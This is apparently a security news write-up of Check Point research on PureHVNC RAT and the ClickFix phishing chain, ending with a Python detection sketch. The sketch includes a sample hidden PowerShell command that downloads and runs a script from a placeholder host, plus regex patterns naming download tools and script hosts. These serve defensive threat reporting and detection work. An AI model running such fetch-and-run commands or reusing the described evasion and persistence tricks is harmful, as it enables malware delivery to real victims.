A recent forensic investigation by Check Point Research (CPR) has shed light on the Pure malware family, a suite of malicious tools developed and sold by a threat actor known as PureCoder. The research centers on a ClickFix phishing campaign that resulted in an eight-day intrusion, where attackers deployed a Rust Loader, PureHVNC RAT, and the Sliver C2 framework to maintain persistence and steal sensitive data.
The infection chain began with fake job advertisements that redirected victims to a ClickFix phishing page. There, malicious PowerShell commands were automatically copied to the clipboard, tricking victims into executing them. If run, these commands downloaded obfuscated JavaScript files that deployed the first instance of PureHVNC RAT.
As CPR explains, “Upon visiting the malicious ClickFix website, a PowerShell command was automatically copied to their clipboard… If executed, the command downloaded and ran a malicious JavaScript file, initiating the infection chain.”

By day two, the attackers escalated by delivering a Rust-based loader that dropped another instance of PureHVNC RAT, this time using the campaign ID amazon3.
At the heart of the operation was PureHVNC RAT, a powerful remote administration tool that provides Hidden Virtual Network Computing (HVNC)—allowing attackers to remotely control infected systems without the user noticing.
The report highlights: “PureHVNC is a product of the Pure family of malicious software developed by PureCoder. The malware provides HVNC capabilities (Hidden Virtual Network Computing), which allows an attacker to control an infected machine without the session being visible to the infected user.”
PureHVNC comes equipped with an extensive plugin system supporting functions such as:
- Remote webcam and microphone access
- Keylogging and clipboard monitoring
- Reverse proxy support (HTTP & SOCKS5)
- Cryptocurrency address hijacking (BTC, ETH, LTC, XMR, etc.)
- YouTube and Twitch bots for automated ad-clicking and subscriptions
- Distributed Denial of Service (DDoS) capabilities
The investigation revealed that PureHVNC and related malware frequently pulled files from GitHub repositories directly controlled by PureCoder. This attribution was possible because commits were tied to GitHub accounts operating in the UTC+0300 timezone, corresponding to regions including Russia.
CPR notes, “Analysis confirmed that both the URLs and the associated GitHub accounts were directly linked to the developer of the Pure malware family.”
Further digging uncovered a PureRAT builder tool, which not only contained hardcoded GitHub URLs supporting malware functionalities but also featured overlapping code with PureCrypter, another PureCoder product.
PureCoder is believed to maintain a broad portfolio of malicious products, including:
- PureCrypter – A malware obfuscator.
- PureLogs – A stealer/logger.
- PureMiner – A silent cryptocurrency miner.
- Blue Loader – An advanced botnet loader.
These products are actively marketed on underground forums and Telegram channels, making them accessible to a wide range of cybercriminals.
The Rust Loader deployed during the campaign included advanced anti-analysis techniques, such as checking for debuggers, reverse-engineering tools, and Windows Defender emulator APIs. If analysis was suspected, the malware delayed execution by up to 30 minutes to evade sandbox detection.
Persistence was achieved by mimicking legitimate scheduled tasks, disguising itself as a Google Updater to remain hidden on compromised systems.
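The two host-side traces the report describes, the ClickFix "paste and run" step (a PowerShell download cradle that fetches and launches a JavaScript file) and the Google Updater look-alike scheduled task, can be checked for in endpoint telemetry. The following is an added detection sketch, not code from the CPR report: it runs over constructed Sysmon-style process-creation events and a scheduled-task inventory, and the allow-list of legitimate Google Update install paths is an assumption to tune per fleet.

```python
import re

# Constructed sample telemetry (Sysmon-style process-creation events and
# a scheduled-task inventory), not data from the CPR report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/a.js '
                    r'-OutFile $env:TEMP\a.js; wscript $env:TEMP\a.js"'},
    {"ParentImage": r"C:\Program Files\Vendor\ide.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File build.ps1"},
]
SAMPLE_TASKS = [
    {"TaskName": r"\GoogleUpdateTaskMachineUA",
     "Action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"},
    {"TaskName": r"\GoogleUpdaterTaskUser",
     "Action": r"C:\Users\Public\Libraries\GoogleUpdate.exe"},
]

# Run-dialog (Win+R) launches, the ClickFix execution step, show up as
# children of explorer.exe; a download cradle plus a script host in one
# command line matches the PowerShell-to-JavaScript chain described above.
CRADLE = re.compile(r"iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget", re.I)
SCRIPT_HOST = re.compile(r"wscript|cscript|mshta|\.js\b|\.hta\b", re.I)
# Assumed allow-list of genuine Google Update locations; tune it per fleet.
GOOGLE_PATHS = re.compile(
    r"^c:\\(program files( \(x86\))?|users\\[^\\]+\\appdata\\local)\\google\\", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def is_clickfix_like(event: dict) -> bool:
    if basename(event["ParentImage"]) != "explorer.exe":
        return False
    if basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cmd = event["CommandLine"]
    return bool(CRADLE.search(cmd) and SCRIPT_HOST.search(cmd))

def is_fake_google_updater(task: dict) -> bool:
    # Task name borrows Google Updater branding but its action runs elsewhere.
    return ("googleupdate" in task["TaskName"].lower()
            and not GOOGLE_PATHS.match(task["Action"]))

def triage(events, tasks):
    """Return suspicious command lines and task names found in the input."""
    return ([e["CommandLine"] for e in events if is_clickfix_like(e)],
            [t["TaskName"] for t in tasks if is_fake_google_updater(t)])
```

On a real fleet, feed `triage` with exported Sysmon Event ID 1 records and the output of `schtasks /query /fo CSV /v` rather than the constructed samples.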
The Check Point investigation exposes not only the technical depth of PureHVNC RAT but also the larger Pure malware ecosystem fueling cybercrime operations. By linking GitHub repositories, builders, and infrastructure directly to PureCoder, researchers have illuminated the developer’s role in enabling widespread malicious activity.